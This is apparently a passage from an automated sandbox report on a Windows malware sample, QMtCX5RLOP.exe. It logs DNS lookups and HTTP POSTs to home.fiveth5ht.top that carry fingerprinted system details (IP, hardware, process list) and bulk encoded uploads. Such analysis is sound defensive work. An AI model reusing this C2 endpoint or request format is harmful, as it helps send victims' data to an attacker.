                                                          Dec 28, 2024 09:42:53.743870974 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.743879080 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.743990898 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.744014978 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.744059086 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.744067907 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.744137049 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.744144917 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.744224072 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.744234085 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.744302988 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.744311094 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.744380951 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.744389057 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.744481087 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.744550943 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.744559050 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.744658947 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.744668007 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.744676113 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.744683981 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.744693041 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.744731903 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.744740009 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.744766951 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.744810104 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.744843006 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.744888067 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.744924068 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.744976044 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.745093107 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.745121956 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.811300039 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.811505079 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:54.734040022 CET4973380192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:54.853487015 CET804973381.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:54.853591919 CET4973380192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:54.861097097 CET4973380192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:54.980577946 CET804973381.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:56.168260098 CET804973381.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:56.168334007 CET804973381.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:56.168378115 CET4973380192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:56.168612003 CET4973380192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:56.287992001 CET804973381.29.149.125192.168.2.4

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 28, 2024 09:42:45.719130993 CET6165953192.168.2.41.1.1.1
                                                          Dec 28, 2024 09:42:45.719239950 CET6165953192.168.2.41.1.1.1
                                                          Dec 28, 2024 09:42:45.859224081 CET53616591.1.1.1192.168.2.4
                                                          Dec 28, 2024 09:42:45.859721899 CET53616591.1.1.1192.168.2.4
                                                          Dec 28, 2024 09:42:50.218509912 CET6166253192.168.2.41.1.1.1
                                                          Dec 28, 2024 09:42:50.218566895 CET6166253192.168.2.41.1.1.1
                                                          Dec 28, 2024 09:42:50.524202108 CET53616621.1.1.1192.168.2.4
                                                          Dec 28, 2024 09:42:50.527970076 CET53616621.1.1.1192.168.2.4
                                                          Dec 28, 2024 09:42:52.102221966 CET6166453192.168.2.41.1.1.1
                                                          Dec 28, 2024 09:42:52.102281094 CET6166453192.168.2.41.1.1.1
                                                          Dec 28, 2024 09:42:52.241796970 CET53616641.1.1.1192.168.2.4
                                                          Dec 28, 2024 09:42:52.241858006 CET53616641.1.1.1192.168.2.4
                                                          Dec 28, 2024 09:42:54.593385935 CET6166653192.168.2.41.1.1.1
                                                          Dec 28, 2024 09:42:54.593446016 CET6166653192.168.2.41.1.1.1
                                                          Dec 28, 2024 09:42:54.733359098 CET53616661.1.1.1192.168.2.4
                                                          Dec 28, 2024 09:42:54.733376026 CET53616661.1.1.1192.168.2.4

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Dec 28, 2024 09:42:45.719130993 CET192.168.2.41.1.1.10xd3dStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                          Dec 28, 2024 09:42:45.719239950 CET192.168.2.41.1.1.10x75c9Standard query (0)httpbin.org28IN (0x0001)false
                                                          Dec 28, 2024 09:42:50.218509912 CET192.168.2.41.1.1.10xdd62Standard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                                          Dec 28, 2024 09:42:50.218566895 CET192.168.2.41.1.1.10x950bStandard query (0)home.fiveth5ht.top28IN (0x0001)false
                                                          Dec 28, 2024 09:42:52.102221966 CET192.168.2.41.1.1.10x76cbStandard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                                          Dec 28, 2024 09:42:52.102281094 CET192.168.2.41.1.1.10x277bStandard query (0)home.fiveth5ht.top28IN (0x0001)false
                                                          Dec 28, 2024 09:42:54.593385935 CET192.168.2.41.1.1.10xb0fcStandard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                                          Dec 28, 2024 09:42:54.593446016 CET192.168.2.41.1.1.10x1d6Standard query (0)home.fiveth5ht.top28IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Dec 28, 2024 09:42:45.859721899 CET1.1.1.1192.168.2.40xd3dNo error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                          Dec 28, 2024 09:42:45.859721899 CET1.1.1.1192.168.2.40xd3dNo error (0)httpbin.org3.218.7.103A (IP address)IN (0x0001)false
                                                          Dec 28, 2024 09:42:50.527970076 CET1.1.1.1192.168.2.40xdd62No error (0)home.fiveth5ht.top81.29.149.125A (IP address)IN (0x0001)false
                                                          Dec 28, 2024 09:42:52.241858006 CET1.1.1.1192.168.2.40x76cbNo error (0)home.fiveth5ht.top81.29.149.125A (IP address)IN (0x0001)false
                                                          Dec 28, 2024 09:42:54.733376026 CET1.1.1.1192.168.2.40xb0fcNo error (0)home.fiveth5ht.top81.29.149.125A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • httpbin.org
                                                          • home.fiveth5ht.top

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.44973181.29.149.125802336C:\Users\user\Desktop\QMtCX5RLOP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 28, 2024 09:42:50.650363922 CET12360OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                          Host: home.fiveth5ht.top
                                                          Accept: */*
                                                          Content-Type: application/json
                                                          Content-Length: 501797
                                                          Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 32 30 33 39 37 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                                          Data Ascii: { "ip": "8.46.123.189", "current_time": "8532915458317203975", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe" [TRUNCATED]
                                                          Dec 28, 2024 09:42:50.770030022 CET2472OUTData Raw: 70 58 38 35 4c 36 63 76 68 4d 5c 2f 2b 61 64 38 52 66 38 41 77 30 38 4d 2b 76 38 41 30 56 33 6d 66 31 62 5c 2f 41 4d 55 35 76 47 37 5c 2f 41 4b 4b 6e 77 72 5c 2f 38 50 66 46 33 5c 2f 77 42 41 35 5c 2f 4b 4e 55 63 6e 62 38 66 36 56 2b 34 33 37 54
                                                          Data Ascii: pX85L6cvhM\/+ad8Rf8Aw08M+v8A0V3mf1b\/AMU5vG7\/AKKnwr\/8PfF3\/wBA5\/KNUcnb8f6V+437Tv8AwS10HQdA+JOrfs7S+ItS1T4Y+LbbTrrwt4h1GPV9W8SeH7v4b+AfGE0+nXMFnYQvrOn6j4k1RYrGKzi+36ctvBCH1C2A1D8Q54J7WeW2uYZILiCR4poZUaOWKWNirxyIwDK6sCGUgEEV+7+FfjLwV4wZbi8fwp
                                                          Dec 28, 2024 09:42:50.770064116 CET2472OUTData Raw: 76 5c 2f 4a 38 6d 65 76 6d 2b 76 66 2b 66 38 36 5a 5c 2f 63 66 5a 6e 39 37 35 76 66 70 5c 2f 68 5c 2f 68 51 64 63 4e 76 6e 2b 69 49 66 4c 32 37 5c 2f 6b 66 62 35 76 38 41 79 30 48 34 66 58 72 54 50 6e 2b 56 5c 2f 77 44 58 4f 66 38 41 57 5c 2f 35
                                                          Data Ascii: v\/J8mevm+vf+f86Z\/cfZn975vfp\/h\/hQdcNvn+iIfL27\/kfb5v8Ay0H4fXrTPn+V\/wDXOf8AW\/5\/z2qXnO\/95\/nn7V\/X\/wCvTZIz8nz4cf5\/Oont8\/0ZvT6\/L9SHzNzbP4z\/AM8z\/rs\/59feoambfIXj7SfX9z9Ov+e3NM67\/kk3\/wDPOP05\/wA54rI6KfX5fqVjs8x3H\/bOSMc+\/wDn6fSmxb5P
                                                          Dec 28, 2024 09:42:50.770133972 CET2472OUTData Raw: 2b 7a 38 5c 2f 77 41 50 2b 43 61 55 2b 76 79 5c 2f 55 5a 38 38 63 61 52 6f 38 59 5c 2f 65 33 50 37 7a 5c 2f 6e 74 2b 50 72 36 5c 2f 54 46 47 66 34 30 65 53 46 35 66 33 76 6d 66 36 69 41 5a 5c 2f 6e 33 34 70 37 53 66 4d 79 66 66 6a 6a 5c 2f 64 66
                                                          Data Ascii: +z8\/wAP+CaU+vy\/UZ88caRo8Y\/e3P7z\/nt+Pr6\/TFGf40eSF5f3vmf6iAZ\/n34p7SfMyffjj\/df6rjv\/pWfSnyRuuzYn8\/tH17e3\/1zWZofuQ\/3j+H8hTae\/X8P6mmVxcj8v6+R\/k+frp+xB4ju5\/gvqOjLcM1pp\/i7V9Pu9Mn23On3trNa6Xq0a3+mXJnsb22afULkCG6tngdklzEx3u\/vuvfC74aeJvMk
                                                          Dec 28, 2024 09:42:50.770144939 CET2472OUTData Raw: 6a 42 34 65 30 5c 2f 57 5c 2f 43 76 37 57 76 37 4f 6b 66 78 37 38 5a 54 61 42 70 56 31 71 43 5c 2f 73 55 2b 4a 5c 2f 41 35 38 61 2b 47 50 67 35 72 6e 69 52 6f 72 74 74 42 38 65 5c 2f 47 62 78 37 70 38 6d 71 65 42 76 67 37 71 50 6c 7a 52 36 64 50
                                                          Data Ascii: jB4e0\/W\/Cv7Wv7Okfx78ZTaBpV1qC\/sU+J\/A58a+GPg5rniRorttB8e\/Gbx7p8mqeBvg7qPlzR6dPow1SzghlbTm1DzX\/nu\/wCCjfga1+HH7WnxB8J2uqXeufZNP8H6jd61qGm+HNK1HVb\/AMQeFtK8QX15f2nhTRfD2h\/aTc6nJEZrXSbaSeKKKW7a4u2nuZv6WfGnxE8H\/FrWP2AfiT8P9atfEXgzxp8ftd8QeH
                                                          Dec 28, 2024 09:42:50.770194054 CET2472OUTData Raw: 49 71 73 75 37 38 4b 68 5c 2f 77 44 51 50 38 5c 2f 68 30 5c 2f 7a 69 72 6e 6c 2b 5c 2f 77 43 6e 5c 2f 77 42 65 71 7a 52 2b 33 79 66 79 41 5c 2f 7a 78 6a 50 76 51 64 50 76 5c 2f 41 4e 33 38 53 47 52 63 66 66 38 41 2b 57 6e 72 32 78 5c 2f 6e 38 73
                                                          Data Ascii: Iqsu78Kh\/wDQP8\/h0\/zirnl+\/wCn\/wBeqzR+3yfyA\/zxjPvQdPv\/AN38SGRcff8A+Wnr2x\/n8s+lRDf\/AB59s\/5x6dKsS\/xfh\/So\/L9\/0\/8Ar0G1Pr8v1I6gbvs\/z\/n37+1WWXb7ioZO34\/0oOwofP8APx9\/r06D\/PtzS7v+Wfb\/AOt9Ks+Xzv8A\/wBfXr9M9vX2qrJH8v8ArPrzn\/P+RQaU+vy\
                                                          Dec 28, 2024 09:42:50.770222902 CET2472OUTData Raw: 57 66 6d 5c 2f 75 50 2b 76 72 5c 2f 36 5c 2f 66 38 41 57 71 33 79 53 66 75 39 6e 7a 78 6e 39 31 2b 36 5c 2f 77 41 5c 2f 35 5c 2f 57 66 61 2b 63 76 36 2b 5a 30 44 46 5c 2f 6a 33 5c 2f 49 6b 6e 2b 74 50 66 72 78 5c 2f 50 6e 36 69 68 4a 48 77 6e 6b
                                                          Data Ascii: Wfm\/uP+vr\/6\/f8AWq3ySfu9nzxn91+6\/wA\/5\/Wfa+cv6+Z0DF\/j3\/Ikn+tPfrx\/Pn6ihJHwnkvv\/eiLzOkH+en+eaftf5P9X\/rf89\/89Oc0ySP+PZs\/6aGXz8dfX8f\/ANdHtfOX9fMBm1I5N6fOP9bL\/wBNv0\/rjv1pd37twnmb44v4Ivr\/AJ\/rzTo\/7m+NPMi\/1n\/LCHv\/AJ\/mKZ5n7zfvk\/Pv
                                                          Dec 28, 2024 09:42:50.770272970 CET2472OUTData Raw: 32 62 63 5c 2f 38 41 4d 6a 5c 2f 45 64 75 4f 66 37 76 68 42 71 5c 2f 4b 37 39 76 7a 34 78 5c 2f 44 37 34 32 66 47 58 77 7a 34 6e 2b 47 4f 75 5c 2f 38 41 43 53 2b 48 64 4e 2b 47 47 69 65 48 72 7a 55 7a 70 65 74 36 4e 35 65 74 57 76 69 6e 78 6e 71
                                                          Data Ascii: 2bc\/8AMj\/EduOf7vhBq\/K79vz4x\/D742fGXwz4n+GOu\/8ACS+HdN+GGieHrzUzpet6N5etWvinxnqVzZLZ6\/pml30ghstW06U3KWxtXNwY45nkhmVP9KP2Wvg99IDwz+k5TzHjLwp8YeAeEcz4G4oy\/N8w4n4E4z4X4dxlaMcFisrweYYvNsqwOXVqyxtGNbAUa9SVRV4OVCPNzH+cf7SXxW8D\/EP6O1XAcJeJfhTxv
                                                          Dec 28, 2024 09:42:50.770298004 CET2472OUTData Raw: 38 41 79 6a 57 5c 2f 61 52 5c 2f 37 6f 39 5c 2f 36 76 76 34 57 31 5c 2f 4b 44 58 39 32 5c 2f 73 2b 50 2b 53 39 38 66 66 2b 79 51 38 44 66 5c 2f 41 46 63 2b 4f 5a 5c 2f 43 33 37 55 37 5c 2f 6c 47 54 36 48 48 5c 2f 41 47 66 66 36 61 66 5c 2f 41 4b
                                                          Data Ascii: 8AyjW\/aR\/7o9\/6vv4W1\/KDX92\/s+P+S98ff+yQ8Df\/AFc+OZ\/C37U7\/lGT6HH\/AGff6af\/AK7\/AOg8V6Kkk7fjUdf6hn+IgVXqxUT9fw\/qaAGVH5fv+n\/16kooOgr0VJJ2\/H+lR0AM2D3\/AM\/hUGZP73+fyq1UUjY\/Dk\/Xt\/n3q+d+X9fM6BlQsu33FTUVXOvP+vmBXoqVo\/Tj2P8An\/GoqOdef9fM
                                                          Dec 28, 2024 09:42:50.770374060 CET2472OUTData Raw: 6c 42 30 46 61 54 6d 4e 6e 32 46 50 4d 34 48 39 44 2b 46 48 79 66 4a 73 68 32 52 5c 2f 36 52 5c 2f 7a 39 66 30 5c 2f 7a 2b 56 50 5c 2f 41 4f 57 6a 70 50 38 41 4a 36 52 35 5c 2f 77 42 62 5c 2f 6e 46 51 2b 59 5c 2f 38 53 58 50 2b 74 38 33 5c 2f 41
                                                          Data Ascii: lB0FaTmNn2FPM4H9D+FHyfJsh2R\/6R\/z9f0\/z+VP\/AOWjpP8AJ6R5\/wBb\/nFQ+Y\/8SXP+t83\/AFv7j\/P0rb3\/AO7+IDMJ8\/zyf88pfM6Y\/wA\/570\/7vyfu\/L\/ANUcS+3+fbBoWQx722B3\/wBV\/wDr\/wA+9MaRPnd0t9\/bzOYKoBnmPId+y3\/d\/nN\/nuPf2p8m+Te\/+p8qLzf+Prz\/ADvW69\/\
                                                          Dec 28, 2024 09:42:50.770392895 CET2472OUTData Raw: 45 64 44 30 66 78 62 5a 65 45 4a 35 76 69 76 38 48 66 41 2b 72 66 45 76 34 35 36 68 2b 7a 68 38 4b 66 43 58 6a 33 56 50 69 6c 61 2b 4a 66 69 5a 38 59 4c 48 52 66 41 2b 74 52 65 46 66 44 73 5c 2f 67 72 34 51 65 4f 5c 2f 42 75 69 5c 2f 77 42 70 72
                                                          Data Ascii: EdD0fxbZeEJ5viv8HfA+rfEv456h+zh8KfCXj3VPila+JfiZ8YLHRfA+tReFfDs\/gr4QeO\/Bui\/wBpr8RfCmm6dq3j\/wAY+C9GbU9R2XmoWdjDLfr4t4e+K3gbxDa6TNaeL\/CL397Bqn9t+Hk1PV7fXvBeqaVq9\/pUuheJ4tc8O6HpMupTrZLqUMnhXWPFGmR2N5bw3uo2mrxX2l2f6NlfiBwBWzevwhlGd5as0yit\/Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.44973281.29.149.125802336C:\Users\user\Desktop\QMtCX5RLOP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 28, 2024 09:42:52.362814903 CET12360OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                          Host: home.fiveth5ht.top
                                                          Accept: */*
                                                          Content-Type: application/json
                                                          Content-Length: 501797
                                                          Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 32 30 33 39 37 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                                          Data Ascii: { "ip": "8.46.123.189", "current_time": "8532915458317203975", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe" [TRUNCATED]
                                                          Dec 28, 2024 09:42:52.482470989 CET2472OUTData Raw: 70 58 38 35 4c 36 63 76 68 4d 5c 2f 2b 61 64 38 52 66 38 41 77 30 38 4d 2b 76 38 41 30 56 33 6d 66 31 62 5c 2f 41 4d 55 35 76 47 37 5c 2f 41 4b 4b 6e 77 72 5c 2f 38 50 66 46 33 5c 2f 77 42 41 35 5c 2f 4b 4e 55 63 6e 62 38 66 36 56 2b 34 33 37 54
                                                          Data Ascii: pX85L6cvhM\/+ad8Rf8Aw08M+v8A0V3mf1b\/AMU5vG7\/AKKnwr\/8PfF3\/wBA5\/KNUcnb8f6V+437Tv8AwS10HQdA+JOrfs7S+ItS1T4Y+LbbTrrwt4h1GPV9W8SeH7v4b+AfGE0+nXMFnYQvrOn6j4k1RYrGKzi+36ctvBCH1C2A1D8Q54J7WeW2uYZILiCR4poZUaOWKWNirxyIwDK6sCGUgEEV+7+FfjLwV4wZbi8fwp
                                                          Dec 28, 2024 09:42:52.482600927 CET2472OUTData Raw: 76 5c 2f 4a 38 6d 65 76 6d 2b 76 66 2b 66 38 36 5a 5c 2f 63 66 5a 6e 39 37 35 76 66 70 5c 2f 68 5c 2f 68 51 64 63 4e 76 6e 2b 69 49 66 4c 32 37 5c 2f 6b 66 62 35 76 38 41 79 30 48 34 66 58 72 54 50 6e 2b 56 5c 2f 77 44 58 4f 66 38 41 57 5c 2f 35
                                                          Data Ascii: v\/J8mevm+vf+f86Z\/cfZn975vfp\/h\/hQdcNvn+iIfL27\/kfb5v8Ay0H4fXrTPn+V\/wDXOf8AW\/5\/z2qXnO\/95\/nn7V\/X\/wCvTZIz8nz4cf5\/Oont8\/0ZvT6\/L9SHzNzbP4z\/AM8z\/rs\/59feoambfIXj7SfX9z9Ov+e3NM67\/kk3\/wDPOP05\/wA54rI6KfX5fqVjs8x3H\/bOSMc+\/wDn6fSmxb5P
                                                          Dec 28, 2024 09:42:52.482652903 CET2472OUTData Raw: 2b 7a 38 5c 2f 77 41 50 2b 43 61 55 2b 76 79 5c 2f 55 5a 38 38 63 61 52 6f 38 59 5c 2f 65 33 50 37 7a 5c 2f 6e 74 2b 50 72 36 5c 2f 54 46 47 66 34 30 65 53 46 35 66 33 76 6d 66 36 69 41 5a 5c 2f 6e 33 34 70 37 53 66 4d 79 66 66 6a 6a 5c 2f 64 66
                                                          Data Ascii: +z8\/wAP+CaU+vy\/UZ88caRo8Y\/e3P7z\/nt+Pr6\/TFGf40eSF5f3vmf6iAZ\/n34p7SfMyffjj\/df6rjv\/pWfSnyRuuzYn8\/tH17e3\/1zWZofuQ\/3j+H8hTae\/X8P6mmVxcj8v6+R\/k+frp+xB4ju5\/gvqOjLcM1pp\/i7V9Pu9Mn23On3trNa6Xq0a3+mXJnsb22afULkCG6tngdklzEx3u\/vuvfC74aeJvMk
                                                          Dec 28, 2024 09:42:52.482697964 CET2472OUTData Raw: 6a 42 34 65 30 5c 2f 57 5c 2f 43 76 37 57 76 37 4f 6b 66 78 37 38 5a 54 61 42 70 56 31 71 43 5c 2f 73 55 2b 4a 5c 2f 41 35 38 61 2b 47 50 67 35 72 6e 69 52 6f 72 74 74 42 38 65 5c 2f 47 62 78 37 70 38 6d 71 65 42 76 67 37 71 50 6c 7a 52 36 64 50
                                                          Data Ascii: jB4e0\/W\/Cv7Wv7Okfx78ZTaBpV1qC\/sU+J\/A58a+GPg5rniRorttB8e\/Gbx7p8mqeBvg7qPlzR6dPow1SzghlbTm1DzX\/nu\/wCCjfga1+HH7WnxB8J2uqXeufZNP8H6jd61qGm+HNK1HVb\/AMQeFtK8QX15f2nhTRfD2h\/aTc6nJEZrXSbaSeKKKW7a4u2nuZv6WfGnxE8H\/FrWP2AfiT8P9atfEXgzxp8ftd8QeH
                                                          Dec 28, 2024 09:42:52.482722998 CET2472OUTData Raw: 49 71 73 75 37 38 4b 68 5c 2f 77 44 51 50 38 5c 2f 68 30 5c 2f 7a 69 72 6e 6c 2b 5c 2f 77 43 6e 5c 2f 77 42 65 71 7a 52 2b 33 79 66 79 41 5c 2f 7a 78 6a 50 76 51 64 50 76 5c 2f 41 4e 33 38 53 47 52 63 66 66 38 41 2b 57 6e 72 32 78 5c 2f 6e 38 73
                                                          Data Ascii: Iqsu78Kh\/wDQP8\/h0\/zirnl+\/wCn\/wBeqzR+3yfyA\/zxjPvQdPv\/AN38SGRcff8A+Wnr2x\/n8s+lRDf\/AB59s\/5x6dKsS\/xfh\/So\/L9\/0\/8Ar0G1Pr8v1I6gbvs\/z\/n37+1WWXb7ioZO34\/0oOwofP8APx9\/r06D\/PtzS7v+Wfb\/AOt9Ks+Xzv8A\/wBfXr9M9vX2qrJH8v8ArPrzn\/P+RQaU+vy\
                                                          Dec 28, 2024 09:42:52.482742071 CET2472OUTData Raw: 57 66 6d 5c 2f 75 50 2b 76 72 5c 2f 36 5c 2f 66 38 41 57 71 33 79 53 66 75 39 6e 7a 78 6e 39 31 2b 36 5c 2f 77 41 5c 2f 35 5c 2f 57 66 61 2b 63 76 36 2b 5a 30 44 46 5c 2f 6a 33 5c 2f 49 6b 6e 2b 74 50 66 72 78 5c 2f 50 6e 36 69 68 4a 48 77 6e 6b
                                                          Data Ascii: Wfm\/uP+vr\/6\/f8AWq3ySfu9nzxn91+6\/wA\/5\/Wfa+cv6+Z0DF\/j3\/Ikn+tPfrx\/Pn6ihJHwnkvv\/eiLzOkH+en+eaftf5P9X\/rf89\/89Oc0ySP+PZs\/6aGXz8dfX8f\/ANdHtfOX9fMBm1I5N6fOP9bL\/wBNv0\/rjv1pd37twnmb44v4Ivr\/AJ\/rzTo\/7m+NPMi\/1n\/LCHv\/AJ\/mKZ5n7zfvk\/Pv
                                                          Dec 28, 2024 09:42:52.482829094 CET4944OUTData Raw: 32 62 63 5c 2f 38 41 4d 6a 5c 2f 45 64 75 4f 66 37 76 68 42 71 5c 2f 4b 37 39 76 7a 34 78 5c 2f 44 37 34 32 66 47 58 77 7a 34 6e 2b 47 4f 75 5c 2f 38 41 43 53 2b 48 64 4e 2b 47 47 69 65 48 72 7a 55 7a 70 65 74 36 4e 35 65 74 57 76 69 6e 78 6e 71
